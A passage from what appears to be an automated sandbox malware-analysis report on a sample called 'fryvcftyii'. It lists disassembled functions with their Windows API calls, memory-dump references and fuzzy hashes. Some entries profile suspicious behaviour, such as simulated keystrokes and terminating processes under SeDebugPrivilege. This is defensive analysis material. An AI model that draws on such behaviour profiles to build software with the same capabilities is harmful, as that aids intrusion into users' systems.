                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                            • String ID:
                            • API String ID: 4090791747-0
                            • Opcode ID: 95c176016da8aee42a7b8541362bfee680d5a8956570b59cfd1959ece248a478
                            • Instruction ID: a8fcfaf4e67ae7479254fa91efdee5fd5b8f60dc7e0ee8b2c5cd5b257071d972
                            • Opcode Fuzzy Hash: 95c176016da8aee42a7b8541362bfee680d5a8956570b59cfd1959ece248a478
                            • Instruction Fuzzy Hash: 6EE19E716042419FC715EF25C881B6BBBE1AF89314F14856EF8899F3A1CB34EC49CB56
                            Function 00424CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0042466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00423697,?), ref: 0042468B
                              • Part of subcall function 0042466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00423697,?), ref: 004246A4
                              • Part of subcall function 00424A31: GetFileAttributesW.KERNEL32(?,0042370B), ref: 00424A32
                            • lstrcmpiW.KERNEL32(?,?), ref: 00424D40
                            • _wcscmp.LIBCMT ref: 00424D5A
                            • MoveFileW.KERNEL32 ref: 00424D75
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                            • String ID:
                            • API String ID: 793581249-0
                            • Opcode ID: e6ec62147ad1055c1f7a9b6ca0eedd22b3a9c15d9b5cfd00ddfeda5e70059d1b
                            • Instruction ID: 4536b3093c7f206bd6564f8a9e7c61a474de020e09005d2add28bf980101375c
                            • Opcode Fuzzy Hash: e6ec62147ad1055c1f7a9b6ca0eedd22b3a9c15d9b5cfd00ddfeda5e70059d1b
                            • Instruction Fuzzy Hash: 245152B21083959BC725DBA0D8819DBB3ECEFC5350F40092FF685D7151EE35A588CB6A
                            Function 003C2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                            Download Yara Rule
                            APIs
                            • LoadImageW.USER32 ref: 003FC2F7
                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003FC319
                            • LoadImageW.USER32 ref: 003FC331
                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 003FC34F
                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 003FC370
                            • DestroyIcon.USER32(00000000), ref: 003FC37F
                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 003FC39C
                            • DestroyIcon.USER32(?), ref: 003FC3AB
                              • Part of subcall function 0044A4AF: DeleteObject.GDI32(00000000), ref: 0044A4E8
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                            • String ID:
                            • API String ID: 2819616528-0
                            • Opcode ID: cc11405d6e593364be57e1882f40d9e56c40aa3cb7de556a233d4faa2511cd51
                            • Instruction ID: 2814158196db736f3df176a6c01fca3902473022474f3846ed7883aa8ecee7e3
                            • Opcode Fuzzy Hash: cc11405d6e593364be57e1882f40d9e56c40aa3cb7de556a233d4faa2511cd51
                            • Instruction Fuzzy Hash: 3B518974A50209AFDB25EF64CC45FAB3BB9EB58350F10492DF902D72A0DB74AC90DB54
                            Function 0041966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0041A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0041A84C
                              • Part of subcall function 0041A82C: GetCurrentThreadId.KERNEL32(00000000,?,00419683,?,00000001), ref: 0041A853
                              • Part of subcall function 0041A82C: AttachThreadInput.USER32(00000000,?,00419683), ref: 0041A85A
                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 0041968E
                            • PostMessageW.USER32 ref: 004196AB
                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 004196AE
                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 004196B7
                            • PostMessageW.USER32 ref: 004196D5
                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004196D8
                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 004196E1
                            • PostMessageW.USER32 ref: 004196F8
                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004196FB
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                            • String ID:
                            • API String ID: 2014098862-0
                            • Opcode ID: b02a8428813dd630208fe1856780624a964a2b53dd0872fa160791bed339473b
                            • Instruction ID: 7b6bfe74b2f048d781dcdd890a4e79b308f6f90c675925bf85981c1efe1198e1
                            • Opcode Fuzzy Hash: b02a8428813dd630208fe1856780624a964a2b53dd0872fa160791bed339473b
                            • Instruction Fuzzy Hash: 1211E1B5910618BEF6106F61DC89FAA3B6DEB4D754F11043AF244AB0A0C9F26C51DAA8
                            Function 00418921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0041853C,00000B00,?,?), ref: 0041892A
                            • HeapAlloc.KERNEL32(00000000,?,0041853C,00000B00,?,?), ref: 00418931
                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0041853C,00000B00,?,?), ref: 00418946
                            • GetCurrentProcess.KERNEL32(?,00000000,?,0041853C,00000B00,?,?), ref: 0041894E
                            • DuplicateHandle.KERNEL32 ref: 00418951
                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0041853C,00000B00,?,?), ref: 00418961
                            • GetCurrentProcess.KERNEL32(0041853C,00000000,?,0041853C,00000B00,?,?), ref: 00418969
                            • DuplicateHandle.KERNEL32 ref: 0041896C
                            • CreateThread.KERNEL32(00000000,00000000,00418992,00000000,00000000,00000000), ref: 00418986
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                            • String ID:
                            • API String ID: 1957940570-0
                            • Opcode ID: 2308ce97f4861913b87a844987d65a07d593eea5af734772c2f0bcb25b9af517
                            • Instruction ID: 965c9261d19544dd6a4e27b334fa53dd8e465a0e061ab8ad9cf2c31afb3547f0
                            • Opcode Fuzzy Hash: 2308ce97f4861913b87a844987d65a07d593eea5af734772c2f0bcb25b9af517
                            • Instruction Fuzzy Hash: 1301BBB9640308FFE710ABA5DC4DF6B3BACEB89711F408461FA05DB1A1CA759C04CB24
                            Function 00439B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID:
                            • String ID: NULL Pointer assignment$Not an Object type
                            • API String ID: 0-572801152
                            • Opcode ID: 2ce45698986cfe48766ef7071a0afc0339dd9efc74a24684aee7ace112f87b5d
                            • Instruction ID: c7f9631d1ebaec4a1c47ae8de4ef920fdf2ee14076547962977b889a830044e5
                            • Opcode Fuzzy Hash: 2ce45698986cfe48766ef7071a0afc0339dd9efc74a24684aee7ace112f87b5d
                            • Instruction Fuzzy Hash: 9FC1B271A00219ABDF10CF58D885BAFB7F5FB48314F14942AE905AB380E7B8AD45CB54
                            Function 0043975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0041710A: CLSIDFromProgID.OLE32 ref: 00417127
                              • Part of subcall function 0041710A: ProgIDFromCLSID.OLE32(?,00000000), ref: 00417142
                              • Part of subcall function 0041710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00417044,80070057,?,?), ref: 00417150
                              • Part of subcall function 0041710A: CoTaskMemFree.OLE32(00000000), ref: 00417160
                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00439806
                            • _memset.LIBCMT ref: 00439813
                            • _memset.LIBCMT ref: 00439956
                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00439982
                            • CoTaskMemFree.OLE32(?), ref: 0043998D
                            Strings
                            • NULL Pointer assignment, xrefs: 004399DB
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                            • String ID: NULL Pointer assignment
                            • API String ID: 1300414916-2785691316
                            • Opcode ID: a97b24d9d4f19dc976df39d0c021df3f081f5d727898eda607d51a99154f323c
                            • Instruction ID: 1f9139f4c7381c175dd266e609cb91a625772277f2c8cf42cb966636a3fc074e
                            • Opcode Fuzzy Hash: a97b24d9d4f19dc976df39d0c021df3f081f5d727898eda607d51a99154f323c
                            • Instruction Fuzzy Hash: 04914A71D00229EBDB11DFA5DC45EDEBBB9AF08310F20416AF519AB281DB756E44CFA0
                            Function 00446D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00446E24
                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 00446E38
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00446E52
                            • _wcscat.LIBCMT ref: 00446EAD
                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00446EC4
                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00446EF2
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend$Window_wcscat
                            • String ID: SysListView32
                            • API String ID: 307300125-78025650
                            • Opcode ID: 9342f4184dcd0c96aaa55d4483e61af60645a035f1f18be91205e88524c0d9b8
                            • Instruction ID: cc43aba0ba40413874e1b012107f6b0d32c899ce7ddf23cfb1d62c69e1e054e4
                            • Opcode Fuzzy Hash: 9342f4184dcd0c96aaa55d4483e61af60645a035f1f18be91205e88524c0d9b8
                            • Instruction Fuzzy Hash: 5E41C074A00348AFEB219F64CC85BEFB7F8EF09350F11482AF584E7291D6759D848B68
                            Function 0043E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00423C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00423C7A
                              • Part of subcall function 00423C55: Process32FirstW.KERNEL32(00000000,?), ref: 00423C88
                              • Part of subcall function 00423C55: CloseHandle.KERNEL32(00000000), ref: 00423D52
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0043E9A4
                            • GetLastError.KERNEL32 ref: 0043E9B7
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0043E9E6
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043EA63
                            • GetLastError.KERNEL32(00000000), ref: 0043EA6E
                            • CloseHandle.KERNEL32(00000000), ref: 0043EAA3
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                            • String ID: SeDebugPrivilege
                            • API String ID: 2533919879-2896544425
                            • Opcode ID: 96c9fda523d045a2d96ed38816699d15dfae727f3dcf035f55bc80f966c9e5a6
                            • Instruction ID: 363832d348ed3c699bc7cd218bb7669971f9212b43be050cbbb12a22470f46e4
                            • Opcode Fuzzy Hash: 96c9fda523d045a2d96ed38816699d15dfae727f3dcf035f55bc80f966c9e5a6
                            • Instruction Fuzzy Hash: 13419871200201AFDB15EF15D895FAAB7A5AF48314F04841EF9069F3C2CB78AD48CB9A
                            Function 00447291 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103windowCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Menu$Item$DrawInfoInsert_memset
                            • String ID: 0$`$
                            • API String ID: 3866635326-1801689331
                            • Opcode ID: 8ab54ac4f53643ebbdfb0ff5643a6a3152dc7e4e988cc5e3a63b49d476c05fca
                            • Instruction ID: 2b8f9e9197ccb38c055bca6e2b5a313f1de23ef0c1fa8fdd13f1d8d0d66eabf5
                            • Opcode Fuzzy Hash: 8ab54ac4f53643ebbdfb0ff5643a6a3152dc7e4e988cc5e3a63b49d476c05fca
                            • Instruction Fuzzy Hash: 83411575A04208EFEB20DF60D884A9ABBF8FB09350F14852AFD15AB350D734AD55DF54
                            Function 00422F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: IconLoad
                            • String ID: blank$info$question$stop$warning
                            • API String ID: 2457776203-404129466
                            • Opcode ID: 1e9a87d06083e98d60e759978aa9751ae5349de1f91286e304524718429ba06a
                            • Instruction ID: 28db2726eb1aa9824116faa1e6f5054d80922b31cd65757d28f2701f2fb235c5
                            • Opcode Fuzzy Hash: 1e9a87d06083e98d60e759978aa9751ae5349de1f91286e304524718429ba06a
                            • Instruction Fuzzy Hash: 86115E313483A67EE7155F14EC42DAB77AC9F153A1B60002BF904662C1DB7C5F0055BD
                            Function 004242F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00424312
                            • LoadStringW.USER32(00000000), ref: 00424319
                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0042432F
                            • LoadStringW.USER32(00000000), ref: 00424336
                            • _wprintf.LIBCMT ref: 0042435C
                            • MessageBoxW.USER32 ref: 0042437A
                            Strings
                            • %s (%d) : ==> %s: %s %s, xrefs: 00424357
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: HandleLoadModuleString$Message_wprintf
                            • String ID: %s (%d) : ==> %s: %s %s
                            • API String ID: 3648134473-3128320259
                            • Opcode ID: e4070f68037980cd2e294ca56a034e0cba7a8b4e079ea4c5672c940ed592cebc
                            • Instruction ID: c58d0ab354857809ad818bdb4b78a3fea73d3797cfebe9536b6d1ed7e7da962d
                            • Opcode Fuzzy Hash: e4070f68037980cd2e294ca56a034e0cba7a8b4e079ea4c5672c940ed592cebc
                            • Instruction Fuzzy Hash: AA01A2F6900218BFE711D7A0DD89EE7736CDB08301F4001B2BB09E2051EA349E894B78
                            Function 003C2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                            Download Yara Rule
                            APIs
                            • ShowWindow.USER32(FFFFFFFF,?), ref: 003C2ACF
                            • ShowWindow.USER32(FFFFFFFF,00000000), ref: 003C2B17
                            • ShowWindow.USER32(FFFFFFFF,00000006), ref: 003FC21A
                            • ShowWindow.USER32(FFFFFFFF,?), ref: 003FC286
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ShowWindow
                            • String ID:
                            • API String ID: 1268545403-0
                            • Opcode ID: 814be4efcd71e579bb2dfc6f76714ef60d80d1ebb99a0240326eae17f0bfdd44
                            • Instruction ID: b8a3f95fd959529012a74f2b754454ae9d4f87f38b172e53c626c9a32502fd41
                            • Opcode Fuzzy Hash: 814be4efcd71e579bb2dfc6f76714ef60d80d1ebb99a0240326eae17f0bfdd44
                            • Instruction Fuzzy Hash: CD412C38614784AADB3B9B28CD88F7B7B95EF46300F168C2DE147C69A0CE75AC55D710
                            Function 004270C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                            Download Yara Rule
                            APIs
                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 004270DD
                              • Part of subcall function 003E0DB6: std::exception::exception.LIBCMT ref: 003E0DEC
                              • Part of subcall function 003E0DB6: __CxxThrowException@8.LIBCMT ref: 003E0E01
                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00427114
                            • EnterCriticalSection.KERNEL32(?), ref: 00427130
                            • _memmove.LIBCMT ref: 0042717E
                            • _memmove.LIBCMT ref: 0042719B
                            • LeaveCriticalSection.KERNEL32(?), ref: 004271AA
                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004271BF
                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 004271DE
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                            • String ID:
                            • API String ID: 256516436-0
                            • Opcode ID: b86892346f10f24fe753e4d8ca2ceecd6f38c34f0fb5a07c8a2e3fbf89a907f3
                            • Instruction ID: 68eee8d4b2a227f14ace03d65d699d870c280f96c4ebd86da5d83645a370be6e
                            • Opcode Fuzzy Hash: b86892346f10f24fe753e4d8ca2ceecd6f38c34f0fb5a07c8a2e3fbf89a907f3
                            • Instruction Fuzzy Hash: 0131BC35A00615EBDB00DFA5DC85AAFBBB8FF45300F1441B6F904AB286DB709E54CBA4
                            Function 004461D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                            Download Yara Rule
                            APIs
                            • DeleteObject.GDI32(00000000), ref: 004461EB
                            • GetDC.USER32(00000000), ref: 004461F3
                            • GetDeviceCaps.GDI32(00000000,0000005A,?,?,0044902A,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 004461FE
                            • ReleaseDC.USER32(00000000,00000000), ref: 0044620A
                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00446246
                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00446257
                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00446291
                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004462B1
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                            • String ID:
                            • API String ID: 3864802216-0
                            • Opcode ID: 268391bdad84ea45a17f5f35bed0a1f5f6b6b2325689ff05c61ea93f260795fc
                            • Instruction ID: b9c5f38f87a6cb78f53202084c147d511c425e92fa83d797565938d5c8754475
                            • Opcode Fuzzy Hash: 268391bdad84ea45a17f5f35bed0a1f5f6b6b2325689ff05c61ea93f260795fc
                            • Instruction Fuzzy Hash: 9F319F76201210BFEB119F50CC8AFEB3BADFF4A765F050065FE089A291C6B59C45CB68
                            Function 0042EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                            Download Yara Rule
                            APIs
